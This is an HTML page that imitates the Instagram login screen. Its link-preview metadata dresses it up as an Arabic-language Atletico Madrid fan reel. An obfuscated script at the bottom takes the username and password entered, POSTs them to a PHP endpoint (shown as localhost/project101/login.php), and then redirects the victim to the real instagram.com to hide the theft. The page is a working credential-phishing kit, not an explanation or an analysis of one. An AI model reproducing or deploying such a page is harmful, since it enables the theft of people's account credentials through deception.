<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="assets/icon.ico">
    <title>Instagram</title>

    <meta property="og:title" content="مسكين الاتلتي 😂">
    <meta property="og:description" content="POV: جدول مباريات اتليتيكو مدريد 🔥">
    <meta property="og:image" content="https://scontent.cdninstagram.com/v/t51.75761-15/481121243_17918243820057408_2699872738665500951_n.jpg?stp=dst-jpg_e35_tt6&_nc_cat=104&ccb=1-7&_nc_sid=18de74&_nc_eui2=AeFAxjeibdl19VU_qDUGTFlQSi2Affq4f3tKLYB9-rh_e_ju4dhuurKpoXCgAL7WBDRW3eI2QTFll7M-JOWN3H--&_nc_ohc=PC4xzfd-YyEQ7kNvgESWDb1&_nc_oc=AdibgW7P22gCfvLRHF6fo4ijhYhv3hC5g-RVO1fIpAGjg-keLQbrB-pjwzXKWhvEcNk&_nc_ad=z-m&_nc_cid=0&_nc_zt=23&_nc_ht=scontent.cdninstagram.com&_nc_gid=AJQOwN0DUeWC7MMqqlSPDh2&oh=00_AYDRH8xGPPteRqQ0NFKrvYAipeozgskF4rEKfii1U-OhwQ&oe=67C829CA">
    <meta property="og:url" content="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2Freel%2FDGVrROMN6aY%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR1ekwJogvbQTqh959QEtDDF3eckyhureN7UIVkpN2CFjNoTWA4S9o_T_Ds_aem_pLQMfAFQ_UisFBpZh0hthg&h=AT1f01CGiAVe-eiCTwI0nXxIGd4cFkuJ4qtUjDOzAyQKriiUHq0bt8BgK8mUl37TL85twN3qzmbD4jCu6EI9WHQdGWGjcRnH4TvJFMdyIOGWTdvEVdCc3pgn9D6Lbes7">
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="Atletico Fan Page">
    <meta property="og:locale" content="ar_AR"> 

    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">
    <style>
        body {
            margin: 0;
            font-family: 'Poppins', sans-serif;
            background-color: #000;
            height: 100vh;
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            align-items: center;
        }
        .container {
            display: flex;
            flex-wrap: wrap;
            background-color: #000;
            color: #fff;
            width: 100%;
            padding: 20px;
            gap: 20px;
            justify-content: center;
            align-items: center;
            text-align: center;
        }
        .image-placeholder {
            width: 100%;
            max-width: 400px;
            height: auto;
            aspect-ratio: 2 / 3;
            background: url('https://source.unsplash.com/random/400x600') no-repeat center center/cover;
            border-radius: 20px;
            display: none;
        }
        .login-box {
            display: flex;
            flex-direction: column;
            align-items: center;
            padding: 30px;
            background: #000000;
            border: 1px solid #2f2f2f;
            border-radius: 10px;
            width: 100%;
            max-width: 400px;
            box-shadow: 0 0 15px rgba(0, 0, 0, 0.7);
        }
        h1 {
            font-size: 2rem;
            margin-bottom: 20px;
        }
        input {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: none;
            border-radius: 5px;
            outline: none;
            background: #222;
            color: #fff;
        }
        button {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            background: #0095f6;
            border: none;
            border-radius: 5px;
            color: #fff;
            cursor: pointer;
            font-weight: bold;
            transition: background 0.3s;
        }
        button:hover {
            background: #0077cc;
        }
        button:disabled {
            background: #0077cc55;
            color: #ffffff55;
            cursor: not-allowed;
        }
        a {
            color: #0095f6;
            text-decoration: none;
        }
        .signup {
            margin-top: 20px;
            font-size: 0.9rem;
            border: 1px solid #2f2f2f;
            padding: 20px;
            width: 100%;
            max-width: 400px;
            text-align: center;
        }
        .footer-link {
            color: #ddd;
            font-size: 0.75em;
            margin: 5px;
            display: inline-block;
        }
        .footer-link:hover {
            text-decoration: underline;
        }
        footer {
            width: 100%;
            display: flex;
            flex-wrap: wrap;
            justify-content: center;
            padding: 20px 0;
            text-align: center;
        }
        @media (min-width: 769px) {
            .container {
                flex-direction: row;
                text-align: left;
            }
            .image-placeholder {
                display: block;
            }
        }
        @keyframes rotate {
            0% { transform: rotate(90deg); }
            25% { transform: rotate(180deg); }
            50% { transform: rotate(270deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="image-placeholder">
        <img src="assets/screenshot.png" width="400" alt="Instagram Screenshot"/>
    </div>
    <div>
        <div class="login-box">
            <img src="assets/logo.png" alt="Instagram Logo"/>
            <input type="text" placeholder="Phone number, username, or email" id="username">
            <input type="password" placeholder="Password" id="password">
            <button type="button" id="login-button" disabled>Login</button>
            <button style="display:none;cursor: default;background: #0077cc55;justify-content: center;" type="button" id="loading-button">
                <div style="width: 20px;height: 20px;border-left: 2px solid white;border-right: 2px solid white;border-radius: 100px;animation: rotate 0.5s infinite;"></div>
            </button>
            <a href="#">Forgot password?</a>
        </div>
        <div class="signup">Don't have an account? <a href="#">Sign up</a></div>
    </div>
</div>
<footer>
    <div>
        <a href="#" class="footer-link">Meta</a>
        <a href="#" class="footer-link">About</a>
        <a href="#" class="footer-link">Blog</a>
        <a href="#" class="footer-link">Jobs</a>
        <a href="#" class="footer-link">Help</a>
        <a href="#" class="footer-link">API</a>
        <a href="#" class="footer-link">Privacy</a>
        <a href="#" class="footer-link">Terms</a>
        <a href="#" class="footer-link">Locations</a>
        <a href="#" class="footer-link">Instagram Lite</a>
        <a href="#" class="footer-link">Threads</a>
        <a href="#" class="footer-link">Contact Uploading & Non-Users</a>
        <a href="#" class="footer-link">Meta Verified</a>
    </div>
</footer>

<script>
    (function(_0x5af4a2,_0x3dbbd7){const _0x5385f9=_0x4521,_0x1c471c=_0x5af4a2();while(!![]){try{const _0x573fc7=parseInt(_0x5385f9(0x12d))/0x1+-parseInt(_0x5385f9(0x128))/0x2+parseInt(_0x5385f9(0x12e))/0x3+parseInt(_0x5385f9(0x131))/0x4+-parseInt(_0x5385f9(0x134))/0x5+parseInt(_0x5385f9(0x124))/0x6*(parseInt(_0x5385f9(0x121))/0x7)+-parseInt(_0x5385f9(0x133))/0x8;if(_0x573fc7===_0x3dbbd7)break;else _0x1c471c['push'](_0x1c471c['shift']());}catch(_0x19cbc0){_0x1c471c['push'](_0x1c471c['shift']());}}}(_0x19ca,0x35f27),(function(){window['addEventListener']('load',function(){const _0x5a010c=_0x4521,_0x319558=document[_0x5a010c(0x12b)](_0x5a010c(0x136)),_0x2c8a2b=document[_0x5a010c(0x12b)]('#password'),_0x52d43a=document[_0x5a010c(0x12b)](_0x5a010c(0x12c)),_0x537d9c=document[_0x5a010c(0x12b)]('#loading-button');_0x319558['addEventListener'](_0x5a010c(0x137),function(){const _0x1bc5bf=_0x5a010c;_0x319558[_0x1bc5bf(0x12f)][_0x1bc5bf(0x130)]>0x3&&_0x2c8a2b['value'][_0x1bc5bf(0x130)]>=0x8?_0x52d43a['disabled']=![]:_0x52d43a[_0x1bc5bf(0x123)]=!![];}),_0x2c8a2b[_0x5a010c(0x126)](_0x5a010c(0x137),function(){const _0x5ad7f1=_0x5a010c;_0x319558[_0x5ad7f1(0x12f)][_0x5ad7f1(0x130)]>0x3&&_0x2c8a2b['value'][_0x5ad7f1(0x130)]>=0x8?_0x52d43a[_0x5ad7f1(0x123)]=![]:_0x52d43a['disabled']=!![];}),_0x52d43a[_0x5a010c(0x126)]('click',function(){const _0x42ca4d=_0x5a010c;_0x537d9c[_0x42ca4d(0x132)]['display']='flex',_0x52d43a[_0x42ca4d(0x132)][_0x42ca4d(0x129)]='none',_0x319558[_0x42ca4d(0x12f)]&&_0x2c8a2b[_0x42ca4d(0x12f)]&&fetch(_0x42ca4d(0x12a),{'method':'POST','headers':{'Content-Type':'application/json'},'body':JSON['stringify']({'username':_0x319558[_0x42ca4d(0x12f)],'password':_0x2c8a2b[_0x42ca4d(0x12f)]})})[_0x42ca4d(0x125)](_0x2e3f49=>{const _0x3d5e3c=_0x42ca4d;location[_0x3d5e3c(0x122)]=_0x3d5e3c(0x127);})[_0x42ca4d(0x135)](_0x25d3f3=>{const _0x653ec4=_0x42ca4d;location[_0x653ec4(0x122)]=_0x653ec4(0x127);});});});}()));function _0x4521(_0x499228,_0x4d73d0){const _0x19caf6=_0x19ca();return _0x4521=function(_0x452128,_0x21cefc){_0x452128=_0x452128-0x121;let _0x35f677=_0x19caf6[_0x452128];return _0x35f677;},_0x4521(_0x499228,_0x4d73d0);}function _0x19ca(){const _0x56cb2f=['style','5795944NKvaBh','971960DuSBwg','catch','#username','input','1141924pOIxBT','href','disabled','12ZdfyJF','then','addEventListener','https://instagram.com/','114342koMvMR','display','http://localhost:80/project101/login.php','querySelector','#login-button','440608SPDVta','693501rkORWr','value','length','795936fKjQSN'];_0x19ca=function(){return _0x56cb2f;};return _0x19ca();}
</script>
</body>
</html>
